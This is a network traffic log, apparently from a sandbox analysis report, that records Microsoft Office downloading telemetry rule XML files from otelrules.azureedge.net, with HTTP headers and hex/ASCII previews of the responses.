                                                                                                                                                                                                                      2024-11-20 16:42:11 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      116192.168.2.74985213.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:11 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:11 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:11 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1360
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BDDEB5124"
                                                                                                                                                                                                                      x-ms-request-id: b47886c8-201e-00aa-0c8c-3a3928000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164211Z-1777c6cb754g9zd5hC1TEBfvpw00000009xg00000000qsp5
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:11 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      117192.168.2.74986413.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:12 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:12 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:12 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1403
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BDCB4853F"
                                                                                                                                                                                                                      x-ms-request-id: eb1e057a-b01e-0097-688c-3a4f33000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164212Z-185f5d8b95c95vpshC1NYC759c0000000ag000000000ekys
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:12 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      118192.168.2.74986713.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:13 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:13 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:13 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1397
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BDFD43C07"
                                                                                                                                                                                                                      x-ms-request-id: 073920b7-a01e-0032-4c8c-3a1949000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164213Z-1777c6cb754mqztshC1TEB4mkc00000009z0000000004wt1
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:13 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      119192.168.2.74986613.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:13 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:13 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:13 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1366
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BDB779FC3"
                                                                                                                                                                                                                      x-ms-request-id: e2992625-501e-005b-678c-3ad7f7000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164213Z-1777c6cb754lv4cqhC1TEB13us00000009s000000000tfwd
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:13 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      120192.168.2.74987513.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:14 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:14 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1427
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BE56F6873"
                                                                                                                                                                                                                      x-ms-request-id: 3044792c-001e-005a-088c-3ac3d0000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164214Z-1777c6cb754gc8g6hC1TEB966c00000009x0000000006ba8
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:14 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      121192.168.2.74987013.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:14 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:14 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1360
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BDD74D2EC"
                                                                                                                                                                                                                      x-ms-request-id: 231cc5cf-201e-0096-37f7-3aace6000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164214Z-r1d97b99577d6qrbhC1TEBux5s000000097000000000g723
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:14 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      122192.168.2.74987613.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:14 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:14 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1390
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BE3002601"
                                                                                                                                                                                                                      x-ms-request-id: c9275fb5-a01e-000d-708c-3ad1ea000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164214Z-185f5d8b95cmd8vfhC1NYC0g4000000006c000000000hht2
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:14 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      123192.168.2.74988713.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:15 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:16 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:16 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1401
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BE2A9D541"
                                                                                                                                                                                                                      x-ms-request-id: 2155ac17-401e-00a3-238c-3a8b09000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164216Z-1777c6cb754vxwc9hC1TEBykgw00000009v000000000enz1
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:16 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      124192.168.2.74988813.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:15 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:16 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:16 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1364
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BEB6AD293"
                                                                                                                                                                                                                      x-ms-request-id: c3eb962b-701e-003e-438c-3a79b3000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164216Z-1777c6cb7549j9hhhC1TEBzmcc00000009q000000000u12v
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
